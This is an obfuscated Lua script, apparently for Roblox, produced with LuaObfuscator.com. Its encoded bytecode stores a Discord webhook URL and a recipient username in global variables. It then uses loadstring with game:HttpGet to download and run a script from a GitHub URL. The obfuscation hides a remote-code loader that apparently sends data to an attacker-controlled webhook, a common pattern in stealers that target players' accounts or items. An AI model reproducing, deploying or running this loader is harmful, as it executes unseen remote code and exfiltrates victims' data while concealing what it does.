--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=v2(v0(v30,16));if v19 then local v88=v5(v83,v19);v19=nil;return v88;else return v83;end end end);local function v20(v31,v32,v33)if v33 then local v84=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-((1639 -(1523 + 114)) -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 67 + 7)))) ;return v84-(v84%(569 -(367 + 201))) ;else local v85=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (877 -(282 + 595)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 -0 ;local v36;local v37;while true do if (v35==(1066 -(68 + 997))) then return (v37 * (1526 -(226 + 1044))) + v36 ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + (8 -6) );v18=v18 + (959 -(892 + 65)) ;v35=118 -(32 + 85) ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + (7 -3) ;return (v41 * (16777566 -(87 + 193 + 70))) + (v40 * 65536) + (v39 * (436 -(67 + 113))) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=2 -1 ;local v45=(v20(v43,3 -2 ,15 + 5 ) * ((7 -(3 + 2))^(984 -(802 + 150)))) + v42 ;local v46=v20(v43,56 -35 ,31);local v47=((v20(v43,57 -25 )==(1 + 0)) and  -(998 -((3340 -2425) + 82))) or (2 -(3 -2)) ;if (v46==(0 + 0)) then if (v45==(438 -(145 + (1152 -(814 + 45))))) then return v47 * (0 -(0 -0)) ;else local v89=1486 -(998 + 488) ;while true do if (v89==(1187 -(1069 + 118))) then v46=1;v44=0 -0 ;break;end end end elseif (v46==2047) then return ((v45==(0 -0)) and (v47 * ((1 + 0)/0))) or (v47 * NaN) ;end return v8(v47,v46-(1817 -794) ) * (v44 + (v45/((2 + 0)^(216 -164)))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;local v50={};for v66=886 -(261 + 624) , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51==(483 -(83 + 396))) then while true do if (v52==(0 + 0)) then local v96=0;while true do if (v96==1) then v52=1 -0 ;break;end if (v96==(0 + 0)) then local v100=560 -(306 + 254) ;while true do if (v100~=(0 + 0)) then else v53=0 -0 ;v54=nil;v100=1;end if (v100~=(1468 -(899 + 568))) then else v96=1 + 0 ;break;end end end end end if (v52~=3) then else v59=nil;while true do local v98=0 -0 ;local v99;while true do if (v98~=0) then else v99=603 -(268 + 335) ;while true do if (v99==(291 -(60 + 230))) then if (v53==(573 -(426 + 146))) then local v147=0 + 0 ;while true do if (v147==(1456 -(282 + 1174))) then local v161=811 -(569 + 242) ;while true do if (v161==1) then v147=2 -1 ;break;end if ((0 + 0)~=v161) then else v57={v54,v55,nil,v56};v58=v23();v161=1;end end end if ((1272 -(945 + 326))==v147) then v59={};v53=2;break;end end end if ((0 -0)==v53) then local v148=0;local v149;local v150;while true do if (v148==(1 + 0)) then while true do if (v149~=(700 -(271 + 429))) then else v150=0;while true do if (v150~=1) then else v56={};v53=1;break;end if (v150~=0) then else v54={};v55={};v150=1 + 0 ;end end break;end end break;end if (v148==(1500 -(1408 + 92))) then v149=0;v150=nil;v148=1087 -(461 + 625) ;end end end break;end if (0~=v99) then else if (v53==2) then local v151=0;local v152;while true do if (v151==0) then v152=1288 -(993 + 295) ;while true do if (v152==0) then for v163=1,v58 do local v164=0;local v165;local v166;local v167;while true do if ((1 + 0)==v164) then v167=nil;while true do if (v165~=0) then else local v175=1171 -(418 + 753) ;while true do if (v175==0) then v166=v21();v167=nil;v175=1 + 0 ;end if (v175~=(1 + 0)) then else v165=1 + 0 ;break;end end end if (v165==(1 + 0)) then if (v166==1) then v167=v21()~=(529 -(406 + 123)) ;elseif (v166==(1771 -(1749 + 20))) then v167=v24();elseif (v166~=(1 + 2)) then else v167=v25();end v59[v163]=v167;break;end end break;end if (0==v164) then v165=0;v166=nil;v164=1323 -(1249 + 73) ;end end end v57[3]=v21();v152=1 + 0 ;end if ((1146 -(466 + 679))~=v152) then else for v168=2 -1 ,v23() do local v169=0 -0 ;local v170;local v171;while true do if (v169==(1900 -(106 + 1794))) then local v174=0;while true do if (v174==1) then v169=1;break;end if (v174==(0 + 0)) then v170=0;v171=nil;v174=1 + 0 ;end end end if (v169==1) then while true do if (0~=v170) then else v171=v21();if (v20(v171,1,2 -1 )==(0 -0)) then local v177=114 -(4 + 110) ;local v178;local v179;local v180;local v181;local v182;while true do if (v177==(585 -(57 + 527))) then v180=nil;v181=nil;v177=1429 -(41 + 1386) ;end if (v177~=(105 -(17 + 86))) then else v182=nil;while true do if (v178==2) then while true do if (v179~=(1 + 0)) then else local v189=0 -0 ;local v190;while true do if (v189==0) then v190=0 -0 ;while true do if (v190==(167 -(122 + 44))) then v179=2;break;end if (v190==(0 -0)) then local v200=0 -0 ;while true do if (0==v200) then v182={v22(),v22(),nil,nil};if (v180==0) then local v204=0 -0 ;local v205;local v206;while true do if (v204~=0) then else v205=65 -(30 + 35) ;v206=nil;v204=1;end if (v204==(1 + 0)) then while true do if (v205==(1257 -(1043 + 214))) then v206=0 -0 ;while true do if (v206~=0) then else v182[1215 -(323 + 889) ]=v22();v182[4]=v22();break;end end break;end end break;end end elseif (v180==(2 -1)) then v182[3]=v23();elseif (v180==(582 -(361 + 219))) then v182[323 -(53 + 267) ]=v23() -(2^(4 + 12)) ;elseif (v180~=(416 -(15 + 398))) then else local v214=982 -(18 + 964) ;local v215;while true do if ((0 -0)==v214) then v215=0;while true do if (v215==0) then v182[2 + 1 ]=v23() -((2 + 0)^(866 -(20 + 830))) ;v182[4 + 0 ]=v22();break;end end break;end end end v200=1;end if ((127 -(116 + 10))~=v200) then else v190=1;break;end end end end break;end end end if (v179~=(1 + 2)) then else if (v20(v181,741 -(542 + 196) ,6 -3 )==(1 + 0)) then v182[4]=v59[v182[4]];end v54[v168]=v182;break;end if ((0 + 0)==v179) then local v192=0;local v193;local v194;while true do if (v192~=(0 + 0)) then else v193=0;v194=nil;v192=1;end if ((2 -1)~=v192) then else while true do if (v193~=0) then else v194=0;while true do if (v194~=1) then else v179=2 -1 ;break;end if (v194==(1551 -(1126 + 425))) then local v201=0;local v202;while true do if ((405 -(118 + 287))==v201) then v202=0 -0 ;while true do if (v202==(1121 -(118 + 1003))) then local v213=0 -0 ;while true do if (v213==(377 -(142 + 235))) then v180=v20(v171,9 -7 ,1 + 2 );v181=v20(v171,981 -(553 + 424) ,10 -4 );v213=1;end if (v213~=1) then else v202=1;break;end end end if (v202==1) then v194=1 + 0 ;break;end end break;end end end end break;end end break;end end end if (v179==(2 + 0)) then local v195=0;local v196;local v197;while true do if (v195~=(1 + 0)) then else while true do if (v196==(0 + 0)) then v197=0;while true do if (v197==0) then local v203=0 + 0 ;while true do if (v203~=(0 -0)) then else if (v20(v181,1,1)~=1) then else v182[5 -3 ]=v59[v182[4 -2 ]];end if (v20(v181,1 + 1 ,9 -7 )==1) then v182[3]=v59[v182[756 -(239 + 514) ]];end v203=1;end if (1==v203) then v197=1;break;end end end if (v197==1) then v179=2 + 1 ;break;end end break;end end break;end if ((1329 -(797 + 532))==v195) then v196=0 + 0 ;v197=nil;v195=1;end end end end break;end if (v178==(1 + 0)) then local v186=0 -0 ;local v187;while true do if (v186==0) then v187=1202 -(373 + 829) ;while true do if (v187==(731 -(476 + 255))) then v181=nil;v182=nil;v187=1131 -(369 + 761) ;end if (v187==(1 + 0)) then v178=2 -0 ;break;end end break;end end end if (v178==(0 -0)) then local v188=238 -(64 + 174) ;while true do if (v188==0) then v179=0;v180=nil;v188=1;end if (v188==(1 + 0)) then v178=1 -0 ;break;end end end end break;end if ((336 -(144 + 192))==v177) then v178=216 -(42 + 174) ;v179=nil;v177=1 + 0 ;end end end break;end end break;end end end v53=3;break;end end break;end end end if (v53~=(3 + 0)) then else local v153=0 + 0 ;local v154;local v155;while true do if (v153==1) then while true do if (v154==(1504 -(363 + 1141))) then v155=1580 -(1183 + 397) ;while true do if (v155==0) then local v172=0;local v173;while true do if (v172==(0 -0)) then v173=0;while true do if ((0 + 0)==v173) then local v183=0 + 0 ;while true do if (v183==0) then for v184=1,v23() do v55[v184-1 ]=v28();end return v57;end end end end break;end end end end break;end end break;end if (v153==0) then v154=1975 -(1913 + 62) ;v155=nil;v153=1;end end end v99=1 + 0 ;end end break;end end end break;end if (v52==(5 -3)) then v57=nil;v58=nil;v52=3;end if (v52==(1934 -(565 + 1368))) then local v97=0;while true do if (v97==(0 -0)) then v55=nil;v56=nil;v97=1662 -(1477 + 184) ;end if (v97~=(1 -0)) then else v52=2;break;end end end end break;end if (v51~=(0 + 0)) then else v52=856 -(564 + 292) ;v53=nil;v51=1;end if (v51~=(2 -0)) then else v56=nil;v57=nil;v51=8 -5 ;end if (v51~=1) then else v54=nil;v55=nil;v51=2;end if (v51==(307 -(244 + 60))) then v58=nil;v59=nil;v51=4 + 0 ;end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v87=0;while true do if (v87==0) then v80=v68[v72];v81=v80[1];v87=1;end if (1==v87) then if (v81<=5) then if (v81<=2) then if (v81<=0) then v78[v80[2]]=v80[3]~=0 ;elseif (v81==1) then v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v72=v80[3];else v78[v80[2]]();end elseif (v81<=3) then v72=v80[3];elseif (v81>4) then do return;end elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=8) then if (v81<=6) then local v103=v80[2];local v104=v78[v80[3]];v78[v103 + 1 ]=v104;v78[v103]=v104[v80[4]];elseif (v81>7) then local v114;local v115,v116;local v117;local v118;v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v118=v80[2];v117=v78[v80[3]];v78[v118 + 1 ]=v117;v78[v118]=v117[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3]~=0 ;v72=v72 + 1 ;v80=v68[v72];v118=v80[2];v115,v116=v71(v78[v118](v13(v78,v118 + 1 ,v80[3])));v73=(v116 + v118) -1 ;v114=0;for v142=v118,v73 do v114=v114 + 1 ;v78[v142]=v115[v114];end v72=v72 + 1 ;v80=v68[v72];v118=v80[2];v78[v118]=v78[v118](v13(v78,v118 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];v72=v80[3];else v78[v80[2]]=v62[v80[3]];end elseif (v81<=10) then if (v81>9) then local v132=0;local v133;while true do if (v132==0) then v133=v80[2];v78[v133]=v78[v133](v13(v78,v133 + 1 ,v73));break;end end else v78[v80[2]]=v80[3];end elseif (v81>11) then local v136=v80[2];local v137,v138=v71(v78[v136](v13(v78,v136 + 1 ,v80[3])));v73=(v138 + v136) -1 ;local v139=0;for v145=v136,v73 do local v146=0;while true do if (v146==0) then v139=v139 + 1 ;v78[v145]=v137[v139];break;end end end else v78[v80[2]][v80[3]]=v80[4];end v72=v72 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B037C3O00682O7470733A2O2F646973636F7264612O702E636F6D2F6170692F776562682O6F6B732F2O313039303738302O3430323435312O3635382F665030396E6C32785A654A5F72675A693666434D5A30375A4E6D7072573251764E504A6146427A513456527468785F7148774F477A31446769714D544B566C666D446E6C030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572585363726970742F6D61696E2F4C7970686572585363726970745A03083O00557365724E616D65030D3O00424947636F2O6C696E3234313003093O00557365724E616D653200173O0012093O00013O0026043O000E000100020004033O000E0001001207000100033O00300800010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000500016O000200056O00013O00024O00010001000100044O001600010026043O0001000100010004033O00010001001207000100033O0030010001000A000B00122O000100033O00302O0001000C000B00124O00023O00044O000100012O00053O00017O00",v9(),...);end
